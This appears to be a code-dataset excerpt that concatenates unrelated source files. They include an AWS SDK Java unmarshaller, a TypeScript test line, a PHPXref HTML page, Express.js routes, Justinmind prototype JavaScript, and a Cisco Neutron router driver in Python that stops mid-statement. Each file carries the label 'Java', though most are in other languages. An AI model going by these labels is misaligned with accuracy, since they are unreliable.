/* * Copyright 2012-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.elasticmapreduce.model.transform; import java.math.*; import javax.annotation.Generated; import com.amazonaws.services.elasticmapreduce.model.*; import com.amazonaws.transform.SimpleTypeJsonUnmarshallers.*; import com.amazonaws.transform.*; import com.fasterxml.jackson.core.JsonToken; import static com.fasterxml.jackson.core.JsonToken.*; /** * DescribeClusterResult JSON Unmarshaller */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class DescribeClusterResultJsonUnmarshaller implements Unmarshaller<DescribeClusterResult, JsonUnmarshallerContext> { public DescribeClusterResult unmarshall(JsonUnmarshallerContext context) throws Exception { DescribeClusterResult describeClusterResult = new DescribeClusterResult(); int originalDepth = context.getCurrentDepth(); String currentParentElement = context.getCurrentParentElement(); int targetDepth = originalDepth + 1; JsonToken token = context.getCurrentToken(); if (token == null) token = context.nextToken(); if (token == VALUE_NULL) { return describeClusterResult; } while (true) { if (token == null) break; if (token == FIELD_NAME || token == START_OBJECT) { if (context.testExpression("Cluster", targetDepth)) { context.nextToken(); describeClusterResult.setCluster(ClusterJsonUnmarshaller.getInstance().unmarshall(context)); } } else if (token == END_ARRAY || token == END_OBJECT) { if (context.getLastParsedParentElement() == null || context.getLastParsedParentElement().equals(currentParentElement)) { if (context.getCurrentDepth() <= originalDepth) break; } } token = context.nextToken(); } return describeClusterResult; } private static DescribeClusterResultJsonUnmarshaller instance; public static DescribeClusterResultJsonUnmarshaller getInstance() { if (instance == null) instance = new DescribeClusterResultJsonUnmarshaller(); return instance; } }
Java
// @target: ES6 var x = 1 % `abc${ 1 }def`;
Java
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Class Reference: testofauthenticator</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Thu Oct 23 18:57:41 2014 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_classes'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logClass('testofauthenticator'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Class Cross Reference</h3> <h2><a href="index.html#testofauthenticator">testofauthenticator</a></h2> <b>Defined at:</b><ul> <li><a href="../tests/simpletest/test/authentication_test.php.html#testofauthenticator">/tests/simpletest/test/authentication_test.php</a> -> <a onClick="logClass('testofauthenticator', '/tests/simpletest/test/authentication_test.php.source.html#l89')" href="../tests/simpletest/test/authentication_test.php.source.html#l89"> line 89</a></li> </ul> <br><b>No references found.</b><br><br> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Thu Oct 23 18:57:41 2014</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
Java
/** * App routes. */ var homepage = require('./homepage'); var user = require('./user'); var news = require('./news'); var test = require('./test'); var passport = require('passport'); function ensureAuthenticated(req, res, next) { if (req.isAuthenticated()) { return next(); } req.flash('error', '抱歉,您尚未登录。'); return res.redirect('/user/signin?redirect=' + req.path); } function ensureAdmin(req, res, next) { if (req.isAuthenticated() && req.user.isadmin) { return next(); } req.flash('error', '抱歉,您不是管理员。'); return res.redirect('/user/signin?redirect=' + req.path); } function ensurePermission(req, res, next) { if (req.isAuthenticated() && req.user.isadmin) { return next(); } if (req.isAuthenticated() && req.user.username == req.params.id) { return next(); } req.flash('error', '抱歉,您没有权限。'); return res.redirect('/user/signin?redirect=' + req.path); } module.exports = function(app) { app.get('/', homepage.index); app.get('/user', ensureAdmin, user.showList); app.get('/user/page/:page(\\d+)', ensureAdmin, user.showList); app.get('/user/register', user.showRegister); app.post('/user/register', user.doRegister); app.get('/user/signin', user.showSignin); app.post('/user/signin', passport.authenticate('local', { successRedirect: '/', successFlash: '登录成功,欢迎回来。', failureRedirect: 'back', failureFlash: '抱歉,手机号或密码错误。', })); app.get('/user/signout', user.doSignout); app.get('/user/:id(\\d{8,13})/edit', ensurePermission, user.showEditUser); app.post('/user/:id(\\d{8,13})/edit', ensurePermission, user.doEditUser); app.get('/user/:id(\\d{8,13})/setadmin', ensureAdmin, user.setAdmin); app.get('/news', news.showList); app.get('/news/page/:page(\\d+)', news.showList); app.get('/news/:id(\\d+)', news.showItem); app.get('/news/:id(\\d+)/edit', ensureAdmin, news.showEditItem); app.post('/news/:id(\\d+)/edit', ensureAdmin, news.doEditItem); app.get('/news/:id(\\d+)/delete', ensureAdmin, news.doDeleteItem); app.get('/news/post', ensureAdmin, news.showNewItem); app.post('/news/post', ensureAdmin, news.doNewItem); app.get('/test', test); app.get('*', function(req, res){ return res.render('homepage', {title: '404'}); }); }
Java
jQuery("#simulation") .on("click", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .click", function(event, data) { var jEvent, jFirer, cases; if(data === undefined) { data = event; } jEvent = jimEvent(event); jFirer = jEvent.getEventFirer(); if(jFirer.is("#s-Label_58")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58": { "attributes": { "font-size": "12.0pt", "font-family": "Roboto-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 .valign": { "attributes": { "vertical-align": "middle", "text-align": "left" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 span": { "attributes": { "color": "#80B8F1", "text-align": "left", "text-decoration": "none", "font-family": "Roboto-Regular,Arial", "font-size": "12.0pt" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59": { "attributes": { "font-size": "20.0pt", "font-family": "IOS8-Icons-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 .valign": { "attributes": { "vertical-align": "middle", "text-align": "left" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 span": { "attributes": { "color": "#80B8F1", "text-align": "left", "text-decoration": "none", "font-family": "IOS8-Icons-Regular,Arial", "font-size": "20.0pt" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimPause", "parameter": { "pause": 300 }, "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58": { "attributes": { "font-size": "12.0pt", "font-family": "Roboto-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 .valign": { "attributes": { "vertical-align": "middle", "text-align": "left" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 span": { "attributes": { "color": "#007DFF", "text-align": "left", "text-decoration": "none", "font-family": "Roboto-Regular,Arial", "font-size": "12.0pt" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59": { "attributes": { "font-size": "20.0pt", "font-family": "IOS8-Icons-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 .valign": { "attributes": { "vertical-align": "middle", "text-align": "left" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 span": { "attributes": { "color": "#157EFB", "text-align": "left", "text-decoration": "none", "font-family": "IOS8-Icons-Regular,Arial", "font-size": "20.0pt" } } } ], "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } else if(jFirer.is("#s-cover")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes": { "opacity": "0.75" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes-ie": { "-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=75)", "filter": "alpha(opacity=75)" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes-ie8lte": { "-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=75)", "filter": "alpha(opacity=75)" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimPause", "parameter": { "pause": 300 }, "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes": { "opacity": "1.0" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes-ie": { "-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)", "filter": "alpha(opacity=100)" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes-ie8lte": { "-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)", "filter": "alpha(opacity=100)" } } } ], "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } else if(jFirer.is("#s-Hotspot_1")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimNavigation", "parameter": { "target": "screens/6709a53d-60b3-4498-bf73-977706fff4da" }, "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } else if(jFirer.is("#s-Hotspot_3")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimNavigation", "parameter": { "target": "screens/27852e19-fc20-4cac-8d96-13d00ac70f75" }, "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } else if(jFirer.is("#s-Button_1")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1": { "attributes": { "font-size": "12.0pt", "font-family": "Roboto-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 .valign": { "attributes": { "vertical-align": "middle", "text-align": "center" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 span": { "attributes": { "color": "#80B8F1", "text-align": "center", "text-decoration": "none", "font-family": "Roboto-Regular,Arial", "font-size": "12.0pt" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimPause", "parameter": { "pause": 300 }, "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1": { "attributes": { "font-size": "12.0pt", "font-family": "Roboto-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 .valign": { "attributes": { "vertical-align": "middle", "text-align": "center" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 span": { "attributes": { "color": "#007DFF", "text-align": "center", "text-decoration": "none", "font-family": "Roboto-Regular,Arial", "font-size": "12.0pt" } } } ], "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } }) .on("pageload", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .pageload", function(event, data) { var jEvent, jFirer, cases; if(data === undefined) { data = event; } jEvent = jimEvent(event); jFirer = jEvent.getEventFirer(); if(jFirer.is("#s-Label_35")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimSetValue", "parameter": { "target": "#s-Label_35", "value": { "action": "jimConcat", "parameter": [ { "action": "jimSubstring", "parameter": [ { "action": "jimSystemTime" },"0","5" ] }," PM" ] } }, "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } });
Java
# Copyright 2015 Cisco Systems, Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from oslo_log import log as logging from oslo_utils import uuidutils from sqlalchemy.orm import exc from sqlalchemy.sql import expression as expr from neutron.db import models_v2 from neutron.extensions import l3 from neutron_lib import constants as l3_constants from neutron_lib import exceptions as n_exc from networking_cisco._i18n import _, _LW from networking_cisco import backwards_compatibility as bc from networking_cisco.plugins.cisco.common import cisco_constants from networking_cisco.plugins.cisco.db.l3 import ha_db from networking_cisco.plugins.cisco.db.l3 import l3_models from networking_cisco.plugins.cisco.db.l3.l3_router_appliance_db import ( L3RouterApplianceDBMixin) from networking_cisco.plugins.cisco.extensions import routerhostingdevice from networking_cisco.plugins.cisco.extensions import routerrole from networking_cisco.plugins.cisco.extensions import routertype from networking_cisco.plugins.cisco.extensions import routertypeawarescheduler from networking_cisco.plugins.cisco.l3 import drivers LOG = logging.getLogger(__name__) DEVICE_OWNER_GLOBAL_ROUTER_GW = cisco_constants.DEVICE_OWNER_GLOBAL_ROUTER_GW HOSTING_DEVICE_ATTR = routerhostingdevice.HOSTING_DEVICE_ATTR ROUTER_ROLE_GLOBAL = cisco_constants.ROUTER_ROLE_GLOBAL ROUTER_ROLE_LOGICAL_GLOBAL = cisco_constants.ROUTER_ROLE_LOGICAL_GLOBAL ROUTER_ROLE_HA_REDUNDANCY = cisco_constants.ROUTER_ROLE_HA_REDUNDANCY TENANT_HSRP_GRP_RANGE = 1 TENANT_HSRP_GRP_OFFSET = 1064 EXT_HSRP_GRP_RANGE = 1 EXT_HSRP_GRP_OFFSET = 1064 N_ROUTER_PREFIX = 'nrouter-' DEV_NAME_LEN = 14 class TopologyNotSupportedByRouterError(n_exc.Conflict): message = _("Requested topology cannot be supported by router.") class ASR1kL3RouterDriver(drivers.L3RouterBaseDriver): def create_router_precommit(self, context, router_context): pass def create_router_postcommit(self, context, router_context): pass def update_router_precommit(self, context, router_context): pass def update_router_postcommit(self, context, router_context): # Whenever a gateway is added to, or removed from, a router hosted on # a hosting device, we must ensure that a global router is running # (for add operation) or not running (for remove operation) on that # hosting device. current = router_context.current if current[HOSTING_DEVICE_ATTR] is None: return e_context = context.elevated() if current['gw_port_id']: self._conditionally_add_global_router(e_context, current) else: self._conditionally_remove_global_router( e_context, router_context.original, True) def delete_router_precommit(self, context, router_context): pass def delete_router_postcommit(self, context, router_context): pass def schedule_router_precommit(self, context, router_context): pass def schedule_router_postcommit(self, context, router_context): # When the hosting device hosts a Neutron router with external # connectivity, a "global" router (modeled as a Neutron router) must # also run on the hosting device (outside of any VRF) to enable the # connectivity. current = router_context.current if current['gw_port_id'] and current[HOSTING_DEVICE_ATTR] is not None: self._conditionally_add_global_router(context.elevated(), current) def unschedule_router_precommit(self, context, router_context): pass def unschedule_router_postcommit(self, context, router_context): # When there is no longer any router with external gateway hosted on # a hosting device, the global router on that hosting device can also # be removed. current = router_context.current hd_id = current[HOSTING_DEVICE_ATTR] if current['gw_port_id'] and hd_id is not None: self._conditionally_remove_global_router(context.elevated(), current) def add_router_interface_precommit(self, context, r_port_context): # Inside an ASR1k, VLAN sub-interfaces are used to connect to internal # neutron networks. Only one such sub-interface can be created for each # VLAN. As the VLAN sub-interface is added to the VRF representing the # Neutron router, we must only allow one Neutron router to attach to a # particular Neutron subnet/network. if (r_port_context.router_context.current[routerrole.ROUTER_ROLE_ATTR] == ROUTER_ROLE_HA_REDUNDANCY): # redundancy routers can be exempt as we check the user visible # routers and the request will be rejected there. return e_context = context.elevated() if r_port_context.current is None: sn = self._core_plugin.get_subnet(e_context, r_port_context.current_subnet_id) net_id = sn['network_id'] else: net_id = r_port_context.current['network_id'] filters = {'network_id': [net_id], 'device_owner': [bc.constants.DEVICE_OWNER_ROUTER_INTF]} for port in self._core_plugin.get_ports(e_context, filters=filters): router_id = port['device_id'] if router_id is None: continue router = self._l3_plugin.get_router(e_context, router_id) if router[routerrole.ROUTER_ROLE_ATTR] is None: raise TopologyNotSupportedByRouterError() def add_router_interface_postcommit(self, context, r_port_context): pass def remove_router_interface_precommit(self, context, r_port_context): pass def remove_router_interface_postcommit(self, context, r_port_context): pass def create_floatingip_precommit(self, context, fip_context): pass def create_floatingip_postcommit(self, context, fip_context): pass def update_floatingip_precommit(self, context, fip_context): pass def update_floatingip_postcommit(self, context, fip_context): pass def delete_floatingip_precommit(self, context, fip_context): pass def delete_floatingip_postcommit(self, context, fip_context): pass def ha_interface_ip_address_needed(self, context, router, port, ha_settings_db, ha_group_uuid): if port['device_owner'] == bc.constants.DEVICE_OWNER_ROUTER_GW: return False else: return True def generate_ha_group_id(self, context, router, port, ha_settings_db, ha_group_uuid): if port['device_owner'] in {bc.constants.DEVICE_OWNER_ROUTER_GW, DEVICE_OWNER_GLOBAL_ROUTER_GW}: ri_name = self._router_name(router['id'])[8:DEV_NAME_LEN] group_id = int(ri_name, 16) % TENANT_HSRP_GRP_RANGE group_id += TENANT_HSRP_GRP_OFFSET return group_id else: net_id_digits = port['network_id'][:6] group_id = int(net_id_digits, 16) % EXT_HSRP_GRP_RANGE group_id += EXT_HSRP_GRP_OFFSET return group_id def pre_backlog_processing(self, context): filters = {routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]} global_routers = self._l3_plugin.get_routers(context, filters=filters) if not global_routers: LOG.debug("There are no global routers") return for gr in global_routers: filters = { HOSTING_DEVICE_ATTR: [gr[HOSTING_DEVICE_ATTR]], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_HA_REDUNDANCY, None] } invert_filters = {'gw_port_id': [None]} num_rtrs = self._l3_plugin.get_routers_count_extended( context, filters=filters, invert_filters=invert_filters) LOG.debug("Global router %(name)s[%(id)s] with hosting_device " "%(hd)s has %(num)d routers with gw_port set on that " "device", {'name': gr['name'], 'id': gr['id'], 'hd': gr[HOSTING_DEVICE_ATTR], 'num': num_rtrs, }) if num_rtrs == 0: LOG.warning( _LW("Global router:%(name)s[id:%(id)s] is present for " "hosting device:%(hd)s but there are no tenant or " "redundancy routers with gateway set on that hosting " "device. Proceeding to delete global router."), {'name': gr['name'], 'id': gr['id'], 'hd': gr[HOSTING_DEVICE_ATTR]}) self._delete_global_router(context, gr['id']) filters = { #TODO(bmelande): Filter on routertype of global router #routertype.TYPE_ATTR: [routertype_id], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]} log_global_routers = self._l3_plugin.get_routers( context, filters=filters) if log_global_routers: log_global_router_id = log_global_routers[0]['id'] self._delete_global_router(context, log_global_router_id, logical=True) def post_backlog_processing(self, context): pass # ---------------- Create workflow functions ----------------- def _conditionally_add_global_router(self, context, tenant_router): # We could filter on hosting device id but we don't so we get all # global routers for this router type. We can then use that count to # determine which ha priority a new global router should get. filters = { routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]} global_routers = self._l3_plugin.get_routers( context, filters=filters) hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers} hosting_device_id = tenant_router[HOSTING_DEVICE_ATTR] ext_nw_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id'] global_router = hd_to_gr_dict.get(hosting_device_id) logical_global_router = self._get_logical_global_router(context, tenant_router) self._conditionally_add_auxiliary_external_gateway_port( context, logical_global_router, ext_nw_id, tenant_router, True) if global_router is None: # must create global router on hosting device global_router = self._create_global_router( context, hosting_device_id, hd_to_gr_dict, tenant_router, logical_global_router) self._conditionally_add_auxiliary_external_gateway_port( context, global_router, ext_nw_id, tenant_router) self._l3_plugin.add_type_and_hosting_device_info(context, global_router) for ni in self._l3_plugin.get_notifiers(context, [global_router]): if ni['notifier']: ni['notifier'].routers_updated(context, ni['routers']) def _conditionally_add_auxiliary_external_gateway_port( self, context, global_router, ext_net_id, tenant_router, provision_ha=False, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW): # tbe global router may or may not have an interface on the # external network that the tenant router uses filters = { 'device_id': [global_router['id']], 'device_owner': [port_type]} connected_nets = { p['network_id']: p['fixed_ips'] for p in self._core_plugin.get_ports(context, filters=filters)} if ext_net_id in connected_nets: # already connected to the external network so we're done return else: # not connected to the external network, so let's fix that aux_gw_port = self._create_auxiliary_external_gateway_port( context, global_router, ext_net_id, tenant_router, port_type) if provision_ha: self._provision_port_ha(context, aux_gw_port, global_router) def _create_auxiliary_external_gateway_port( self, context, global_router, ext_net_id, tenant_router, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW): # When a global router is connected to an external network then a # special type of gateway port is created on that network. Such a # port is called auxiliary gateway ports. It has an ip address on # each subnet of the external network. A (logical) global router # never has a traditional Neutron gateway port. filters = { 'device_id': [tenant_router['id']], 'device_owner': [l3_constants.DEVICE_OWNER_ROUTER_GW]} # fetch the gateway port of the *tenant* router so we can determine # the CIDR of that port's subnet gw_port = self._core_plugin.get_ports(context, filters=filters)[0] fixed_ips = self._get_fixed_ips_subnets(context, gw_port) global_router_id = global_router['id'] with context.session.begin(subtransactions=True): aux_gw_port = self._core_plugin.create_port(context, { 'port': { 'tenant_id': '', # intentionally not set 'network_id': ext_net_id, 'mac_address': bc.constants.ATTR_NOT_SPECIFIED, 'fixed_ips': fixed_ips, 'device_id': global_router_id, 'device_owner': port_type, 'admin_state_up': True, 'name': ''}}) router_port = bc.RouterPort( port_id=aux_gw_port['id'], router_id=global_router_id, port_type=port_type) context.session.add(router_port) return aux_gw_port def _create_global_router( self, context, hosting_device_id, hd_to_gr_dict, tenant_router, logical_global_router): r_spec = {'router': { # global routers are not tied to any tenant 'tenant_id': '', 'name': self._global_router_name(hosting_device_id), 'admin_state_up': True}} global_router, r_hd_b_db = self._l3_plugin.do_create_router( context, r_spec, tenant_router[routertype.TYPE_ATTR], False, True, hosting_device_id, ROUTER_ROLE_GLOBAL) # make the global router a redundancy router for the logical # global router (which we treat as a hidden "user visible # router" (how's that for a contradiction of terms! :-) ) with context.session.begin(subtransactions=True): ha_priority = ( ha_db.DEFAULT_MASTER_PRIORITY - len(hd_to_gr_dict) * ha_db.PRIORITY_INCREASE_STEP) r_b_b = ha_db.RouterRedundancyBinding( redundancy_router_id=global_router['id'], priority=ha_priority, user_router_id=logical_global_router['id']) context.session.add(r_b_b) return global_router def _get_logical_global_router(self, context, tenant_router): # Since HA is also enabled on the global routers on each hosting device # those global routers need HA settings and VIPs. We represent that # using a Neutron router that is never instantiated/hosted. That # Neutron router is referred to as the "logical global" router. filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]} logical_global_routers = self._l3_plugin.get_routers( context, filters=filters) if not logical_global_routers: # must create logical global router logical_global_router = self._create_logical_global_router( context, tenant_router) else: logical_global_router = logical_global_routers[0] self._update_ha_redundancy_level(context, logical_global_router, 1) return logical_global_router def _create_logical_global_router(self, context, tenant_router): r_spec = {'router': { # global routers are not tied to any tenant 'tenant_id': '', 'name': self._global_router_name('', logical=True), 'admin_state_up': True, # set auto-schedule to false to keep this router un-hosted routertypeawarescheduler.AUTO_SCHEDULE_ATTR: False}} # notifications should never be sent for this logical router! logical_global_router, r_hd_b_db = ( self._l3_plugin.do_create_router( context, r_spec, tenant_router[routertype.TYPE_ATTR], False, True, None, ROUTER_ROLE_LOGICAL_GLOBAL)) with context.session.begin(subtransactions=True): r_ha_s_db = ha_db.RouterHASetting( router_id=logical_global_router['id'], ha_type=cfg.CONF.ha.default_ha_mechanism, redundancy_level=1, priority=ha_db.DEFAULT_MASTER_PRIORITY, probe_connectivity=False, probe_target=None, probe_interval=None) context.session.add(r_ha_s_db) return logical_global_router def _get_fixed_ips_subnets(self, context, gw_port): nw = self._core_plugin.get_network(context, gw_port['network_id']) subnets = [{'subnet_id': s} for s in nw['subnets']] return subnets def _provision_port_ha(self, context, ha_port, router, ha_binding_db=None): ha_group_uuid = uuidutils.generate_uuid() router_id = router['id'] with context.session.begin(subtransactions=True): if ha_binding_db is None: ha_binding_db = self._get_ha_binding(context, router_id) group_id = self.generate_ha_group_id( context, router, {'device_owner': DEVICE_OWNER_GLOBAL_ROUTER_GW}, ha_binding_db, ha_group_uuid) r_ha_g = ha_db.RouterHAGroup( id=ha_group_uuid, tenant_id='', ha_type=ha_binding_db.ha_type, group_identity=group_id, ha_port_id=ha_port['id'], extra_port_id=None, subnet_id=ha_port['fixed_ips'][0]['subnet_id'], user_router_id=router_id, timers_config='', tracking_config='', other_config='') context.session.add(r_ha_g) def _get_ha_binding(self, context, router_id): with context.session.begin(subtransactions=True): query = context.session.query(ha_db.RouterHASetting) query = query.filter( ha_db.RouterHASetting.router_id == router_id) return query.first() # ---------------- Remove workflow functions ----------------- def _conditionally_remove_global_router(self, context, tenant_router, update_operation=False): filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL], HOSTING_DEVICE_ATTR: [tenant_router[HOSTING_DEVICE_ATTR]]} global_routers = self._l3_plugin.get_routers(context, filters=filters) hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers} if global_routers: global_router_id = global_routers[0]['id'] if not tenant_router or not tenant_router[l3.EXTERNAL_GW_INFO]: # let l3 plugin's periodic backlog processing take care of the # clean up of the global router return ext_net_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id'] routertype_id = tenant_router[routertype.TYPE_ATTR] hd_id = tenant_router[HOSTING_DEVICE_ATTR] global_router = hd_to_gr_dict.get(hd_id) port_deleted = self._conditionally_remove_auxiliary_gateway_port( context, global_router_id, ext_net_id, routertype_id, hd_id, update_operation) if port_deleted is False: # since no auxiliary gateway port was deleted we can # abort no since auxiliary gateway port count cannot # have reached zero return filters = { 'device_id': [global_router_id], 'device_owner': [DEVICE_OWNER_GLOBAL_ROUTER_GW]} num_aux_gw_ports = self._core_plugin.get_ports_count( context, filters=filters) if num_aux_gw_ports == 0: # global router not needed any more so we delete it self._delete_global_router(context, global_router_id) do_notify = False else: do_notify = 